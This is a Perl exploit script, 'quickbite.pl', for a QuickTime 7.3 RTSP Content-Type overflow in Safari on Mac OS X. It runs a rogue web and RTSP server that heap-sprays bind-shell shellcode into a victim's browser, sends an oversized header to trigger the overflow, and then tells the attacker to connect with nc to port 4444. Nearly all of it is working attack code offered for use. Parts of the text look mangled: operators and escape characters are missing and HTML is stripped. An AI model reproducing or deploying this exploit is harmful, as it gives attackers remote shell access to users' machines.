#
# quickbite.pl
#
# Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit
# for Mac OS X (Intel)
#
# Tested with OS X 10.4.
# On victim, browse to http://server:8080/
# Binds shell on port 4444.
#
# by krafty
#
# greets to sk, halvar, grugq, and all the ethnical hackers
# extra thanks to ddz for osx hackery
# sec-con greets to secwest, blackhat, hitb, hacklu, itu, xcon, syscan, poc
# sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders.
# milw0rm and packetstorm rule
# Bring back the days of technotronic and r00tshell! Freedom.
#
# Why is this exploit called "Quickbite"? Here's a dumb Apple joke:
# "What's worse than biting into an apple and finding a worm?"
# "Finding half a worm".
use Socket;
use IO::Handle;
use constant MY_HTTP_PORT => 8080;
$shellcode = "%uc031%u6850%u02ff%u5c11%ue789%u6a50%u6a01%u6a02%ub010%ucd61%u5780%u5050%u686a%ucd58%u8980%uec47%u6ab0%u80cd%u1eb0%u80cd%u5050%u5a6a%ucd58%uff80%ue44f%uf679%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5053%u3bb0%u80cd";
$buf = chr(0x11) x 6000;
# don't touch anything below this line
$html = <
var prefix = unescape("%u3166%uB0C0%uCD42%uFE80%u3CC0%u7501%uB004%uCD01%u9080");
var shellcode = unescape("$shellcode");
shellcode = prefix shellcode;
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
spray = spray;
} while(spray.length < 0xc0000);
memory = new Array();
for(i = 0; i < 50; i )
memory[i] = spray shellcode;
var url = "rtsp://" location.host "/x.mp3";
document.write("");
ENDHTML
$rtsp_body =
"v=0rn" .
"o=- 16689332712 1 IN IP4 0.0.0.0rn" .
"s=MPEG-1 or 2 Audiorn" .
"i=1.mp3rn" .
"t=0 0rn" .
"a=tool:hellorn" .
"a=type:broadcastrn" .
"a=control:*rn" .
"a=range:npt=0-213.077rn" .
"a=x-qt-text-nam:MPEG-1 or 2 Audiorn" .
"a=x-qt-text-inf:1.mp3rn" .
"m=audio 0 RTP/AVP 14rn" .
"c=IN IP4 0.0.0.0rn" .
"a=control:track1rn";
$content_length = length($rtsp_body);
$rtsp_header =
"RTSP/1.0 200 OKrn" .
"CSeq: 1rn" .
"Date: 0x00 :Prn" .
"Content-Base: rtsp://0.0.0.0/x.mp3/rn" .
"Content-Type: $bufrn" .
"Content-Length: $content_lengthrnrn";
$rtsp = $rtsp_header . $rtsp_body;
$http_header = "HTTP/1.1 200 OKnContent-type: text/htmlnn";
$| = 1;
my $port = MY_HTTP_PORT;
my $protocol = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "socket() failed: $!";
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in($port,INADDR_ANY);
bind(SOCK,$my_addr) or die "bind() failed: $!";
listen(SOCK,SOMAXCONN) or die "listen() failed: $!";
warn "waiting for incoming connections on port $port...n";
$repeat = 1;
$victim = inet_aton("0.0.0.0");
while($repeat) {
next unless my $remote_addr = accept(SESSION,SOCK);
my ($port,$hisaddr) = sockaddr_in($remote_addr);
warn "Connection from [",inet_ntoa($hisaddr),",$port]n";
$victim = $hisaddr;
SESSION->autoflush(1);
$request = "";
while(
$request_line = $_;
$request .= $request_line;
chomp($request_line);
if($request_line =~ /DESCRIBE rtsp/) {
$repeat = 0;
}
$x = length($request_line);
if($x <= 1) {
last;
}
}
print STDERR $request;
if($repeat) {
print SESSION $http_header . $html;
}
else {
print SESSION $rtsp;
}
warn "Connection from [",inet_ntoa($hisaddr),",$port] finishedn";
close SESSION;
}
print "Connect to ".inet_ntoa($victim).":4444 after 5 secondsn";
print "nc -nvv ".inet_ntoa($victim)." 4444nEnjoy!n";